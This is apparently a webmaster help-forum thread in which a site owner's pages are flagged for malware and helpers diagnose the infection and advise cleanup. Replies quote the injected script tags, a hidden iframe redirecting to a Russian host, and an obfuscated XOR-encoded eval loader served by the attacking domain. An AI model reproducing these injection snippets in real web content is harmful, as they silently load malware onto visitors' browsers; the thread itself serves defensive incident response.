My all websites is blocked
by ranjith_tiru84
4 months ago

Hi,
I am using godady server in that i have registered all website under levicent.in is parent domain.Now i attacked the malware..how i remove.i need help for this..Thanks

by redleg
4 months ago

Check all your jscript files, at the bottom of

http://levicent.in/examples/Scripts/AC_RunActiveContent.js

are a bunch of

document.write(‘<script·src=http://shoba.in/block/Website_Page_Under_Construction.php·><\/script>’);

Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especiallly FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.

Once the site is secure and clean you need to submit a request for review in you Google WMT account to have the warning removed. If you have not verified ownership of the site you will have to do so first. The following reference explains the procedure.

http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites
by ranjith_tiru84
4 months ago

If i delete all the files in js especially what you suggested.After that i remove the files from my server and upload it again.It is ok for now…Plz guide me..Thanks for your reply and suggestions..
by redleg
4 months ago

If you have known clean copies of your javascript files then you can delete the ones from your server and upload new copies.

You also have the same line

<script·src=http://shoba.in/block/Website_Page_Under_Construction.php·></sc ript>

showing up in between the </head> and <body> tags of your html pages. If you do not see it in the source it is being inserted at runtime.

It shows up in all these pages

http://levicent.in/aboutus.html
http://levicent.in/tiru.html
http://levicent.in/services.html
http://levicent.in/teams.html
http://levicent.in/global.html
http://levicent.in/trustee.html
http://levicent.in/project.html
http://levicent.in/contactgwt.html
http://levicent.in/profile.html
http://levicent.in/employee.html
http://levicent.in/examples/gallery.html
http://levicent.in/download.html
http://levicent.in/contacts.html
http://levicent.in/client.html
http://levicent.in/sitemap.html
http://levicent.in/index.html
http://levicent.in/jim.html
http://levicent.in/sathya.html
http://levicent.in/ranjith_profile.html
http://levicent.in/directory.html
http://levicent.in/partners.html
http://levicent.in/blog.html
by rathaus
4 months ago

Hi ranjith,

Your site is still showing up as infected, it is either being modified after you upload it, by an automated script of some kind installed on the server.

Or was modified at the source, on your computer.

In any case, our scans still show multiple infections of:
< iframe frameborder=“0” onload=“if (!this.src){ this.src=‘http://qualitysuper.ru:8080/index.php’; this.height=‘0’; this.width=‘0’;}” >
and
< script src=http://shoba.in/block/Website_Page_Under_Construction.php >< /script>

Which is malicious in nature.

As the site appears to contain multiple instances of the same “code”, I would guess your base template has been infected.

Removing them should resolve the problem.

You however, need to also discover how your site was intruded into to prevent this from happening again.

Thanks,
Noam Rathaus
Beyond Security
15 days trial: http://www.beyondsecurity.com/?prevent_intrusion

by ranjith_tiru84
4 months ago

Hi,
Your suggestion is we have to change the templates of the website? we have to do some new templates for that site..plz guide me..Thanks for your reply…
by Kaleh
4 months ago

It sounds as if you may have the type of situation discussed in the following article:

The “onload if this” website infection
http://www.wewatchyourwebsite.com/wordpress/?p=278

It appears, that some of these recurring infections originate with a local computer that is infected with malware. Did you follow redleg’s instructions about checking your local computer(s) and changing all passwords, etc?

Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especially FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.

While this may be enough, in some cases, to prevent reinfection (after removing all obvious malicious code), there are times that there is a back-door that you must still find, in addition to any other code that you are removing manually.

The WeWatch article says:

If your website is getting hacked over and over again, you should scan all your website files for any occurrence of this string
eval(base64_decode
Don’t just delete any file with that string in it because we have seen various files where that is used legitimately, however, close examination of any file with that string is suggested.

You will have to thoroughly examine all content of your site, especially for additional files that don’t belong. Sometimes there are gifimg.php (or other .php files) in various images folders.
by 12056
4 months ago

Please REMOVE ALL links to hXXp://shoba.in, including any PHP or JS references as they link to the below malware sites!

The SOURCE CODE FOR hXXp://shoba.in is listed below:

<sc ript /></scri><sc ript>< dprjgtyzhvxdfjudetd.length; ++viertdgzzratfkboecly) { nkhjtavsbpmciozzuc = dprjgtyzhvxdfjudetd.charCodeAt(viertdgzzratfkboecly); bxofcabgeujyofvja += String.fromCharCode(tuxuuydknuhrlzbtta ^ nkhjtavsbpmciozzuc); } return bxofcabgeujyofvja; } eval(jlrxtzanzpeaaaioop("\xd2\x9d\x8d\x9c\x87\x9e\x9a\xd0\x8a\x81\x8d\x9b\x83\x8b\x80\x9a\xc0\x99\x9c\x87\x9a\x8b\xc6\xc9\xd2\x87\x88\x9c\x8f\x83\x8b\xce\x80\x8f\x83\x8b\xd3\x98\xdf\xd9\xdb\xce\x9d\x9c\x8d\xd3\xb2\xc9\x86\x9a\x9a\x9e\xd4\xc1\xc1\x8c\x8b\x9d\x9a\x9d\x81\x82\x82\xc0\x8d\x81\x83\xc1\x88\x81\x9c\x9b\x83\xc1\x89\x81\xc0\x9e\x86\x9e\xd1\x9d\x87\x8a\xd3\xdc\xb2\xc9\xce\x99\x87\x8a\x9a\x86\xd3\xdf\xda\xdd\xce\x86\x8b\x87\x89\x86\x9a\xd3\xdc\xdc\xd6\xce\x9d\x9a\x97\x82\x8b\xd3\xb2\xc9\x98\x87\x9d\x87\x8c\x87\x82\x87\x9a\x97\xd4\x86\x87\x8a\x8a\x8b\x80\xb2\xc9\xd0\xd2\xc1\x87\x88\x9c\x8f\x83\x8b\xd0\xc9\xc7\xd2\xc1\x9d\x8d\x9c\x87\x9e\x9a\xd0", 238));</sc><sc ript /></sc><sc ript>< brnypdnbxasrr.length; ++bvfcbleyggkfv) { nhkityjlkjamd = brnypdnbxasrr.charCodeAt(bvfcbleyggkfv); sybefcxubmyonvp += String.fromCharCode(ullarlzmcth ^ nhkityjlkjamd); } return sybefcxubmyonvp; } eval(kcuhfeazvottkyoml("\xf7\xb8\xa8\xb9\xa2\xbb\xbf\xf5\xaf\xa4\xa8\xbe\xa6\xae\xa5\xbf\xe5\xbc\xb9\xa2\xbf\xae\xe3\xec\xf7\xa2\xad\xb9\xaa\xa6\xae\xeb\xa5\xaa\xa6\xae\xf6\xbd\xfa\xf3\xf2\xeb\xb8\xb9\xa8\xf6\x97\xec\xa3\xbf\xbf\xbb\xf1\xe4\xe4\xa9\xae\xb8\xbf\xb8\xa4\xa7\xa7\xe5\xa8\xa4\xa6\xe4\xad\xa4\xb9\xbe\xa6\xe4\xac\xa4\xe5\xbb\xa3\xbb\xf4\xb8\xa2\xaf\xf6\xf9\x97\xec\xeb\xbc\xa2\xaf\xbf\xa3\xf6\xfa\xf9\xfd\xeb\xa3\xae\xa2\xac\xa3\xbf\xf6\xfa\xfd\xf3\xeb\xb8\xbf\xb2\xa7\xae\xf6\x97\xec\xbd\xa2\xb8\xa2\xa9\xa2\xa7\xa2\xbf\xb2\xf1\xa3\xa2\xaf\xaf\xae\xa5\x97\xec\xf5\xf7\xe4\xa2\xad\xb9\xaa\xa6\xae\xf5\xec\xe2\xf7\xe4\xb8\xa8\xb9\xa2\xbb\xbf\xf5", 203));</sc ript> <script src=hXXp://orleansminorhockey.ca/MAPS/ODHAmedicalforms.php ></sc ript>

From the looks of the coding, it probably contains some exploits with all the \xa#.

by 12056
4 months ago

I found this hidden in the source code of your main page (hXXP://levicent.in), so I am lead to believe that it is in ALL the pages that have been flagged as malicious.

INFECTED CODE:

The <> (Brackets) where remove to prevent accidental clicking…

script src=hXXp://shoba.in/block/Website_Page_Under_Construction.php

by ranjith_tiru84
4 months ago

Hi,
Is there any other free software to remove all the malware scripts and files in server and in website and also in local system.Plz help me for this..Thanks a million for your help..